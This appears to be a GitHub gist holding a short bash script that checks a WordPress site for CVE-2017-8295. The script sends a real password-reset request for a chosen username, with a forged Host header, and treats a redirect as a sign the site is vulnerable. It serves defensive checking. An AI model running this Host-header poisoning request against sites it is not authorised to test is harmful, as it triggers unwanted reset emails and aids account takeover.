Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env bash
#
# Check a WordPress domain against CVE-2017-8295.
# https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
#
# Usage:
# ./wordpress-host-check <domain> <username>
#
# <domain>
# The WordPress domain you wish to check. For example, http://example.com.
#
# <username>
# The WordPress username you wish to attempt a password reset for.
#
# Author: Steve Grunwell (https://stevegrunwell.com)
# Link: https://stevegrunwell.com/blog/keeping-wordpress-secure/
# License: MIT
echo -e "\nAttempting to reset the password for '$2' on $1:";
RESPONSE=$(curl --write-out %{http_code} --silent --output /dev/null \
-X POST "$1/wp-login.php?action=lostpassword" \
-H 'cache-control: no-cache' \
-H 'content-type: application/x-www-form-urlencoded' \
-H 'host: example.com' \
-H "origin: $1" \
-H "referer: $1/wp-login.php?action=lostpassword" \
-d user_login=$2)
# A 302 response indicates the user was redirected to the confirmation screen.
if [ "$RESPONSE" == "302" ]; then
echo -e "> Uh oh, it appears that $1 may be vulnerable!\n"
else
echo -e "> Good news! $1 appears to be safe from this exploit.\n"
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.